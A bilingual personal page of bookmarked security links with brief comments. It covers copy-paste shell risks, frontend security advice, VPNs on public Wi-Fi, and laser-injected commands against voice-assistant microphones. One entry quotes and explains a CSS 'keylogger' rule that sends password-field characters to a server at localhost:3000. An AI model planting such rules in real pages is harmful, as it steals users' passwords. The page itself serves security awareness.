An example with the JS code that copy/pasting from the shell commands from the web is a dangerous action

An example of live DDOS

Malin ! Un keylogger en CSS !

En fait un script génère pour tous les caractères ASCII, l'instruction CSS suivante :

input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}

Qui signifie que pour les champs de type password dont la valeur se termine par a, on va effectuer une requête externe vers un serveur avec la lettre a. On fait ça pour tous les caractères et hop on a le mot de passe.

(via https://links.hoa.ro/shaare/689gzA, via https://bookmarks.ecyseo.net/?cymp8g)

• Ne jamais faire confiance aux applications frontend
• N'utilisez pas votre propre cryptographie
• N'utilisez pas de clé de chiffrement prédictibles
• Ne réutilisez pas une clé de chiffrement
• Obfusquer n'est pas sécuriser
• Sécurisez plutôt votre backend

Et de bon conseils pratiques comme éviter d'utiliser des promesses pour traiter les requêtes du client, mais plutôt des callbacks

Tests the security of the SSL protocols for a server

It is hard to know if the equipment are patched... It's ugly; datas are not encrypted at a moment during transmission 😔
That's why end-to-end encryption is so important.
(via https://sebsauvage.net/links/?kbFs9w)

If someone says that MacOS is more secure, then this link will be useful

TL;DR Websites uses now HTTPS so public Wi-Fi is not a problem anymore

Use it with a VPN is better :

• Some protocols are not blocked anymore (P2P, VOIP, ...)
• Websites are not blockled by the WAP
• Avoid DNS lies
• Hide metadatas from navigation

VPN is still useful on public Wi-Fi
(shared by sebsauvage)

Quelle agréable surprise !

Énorme : utiliser un laser, donc de la lumière, pour actionner les microphones des mouchards style Google Home et ainsi leur envoyer des commandes vocales via laser.

Le laser chauffe le micro qui détecte ça comme une déformation et donc un son. Cela marche sur les micros à base de MEMS (systèmes micro-électro-mécanique), qui sont des « sculptures » en silicium microscopiques qui réagissent à la pression et remplacent les micros à base de membrane. Ils sont très sensibles.
En modulant une voix dans le signal laser, on peut envoyer des commandes au micro avec de la lumière.

[...] Bref, on a là toute une jolie technologique (domotique et assistants vocaux, que ce soit ceux des Gafam ou non d’ailleurs) qui est « facilement » piratable à cause d’une sécurité lacunaire.
Certains s’étaient déjà retrouvés dans le noir quand il fallait faire une mise à jour des ampoules ou des volets, avec tout ceci, vraiment le futur promet de grandes tranches de rigolade.

(feed du Hollandais Volant)

🤣

Un service qui permet de savoir si l'adresse e-mail a été compromise... TODO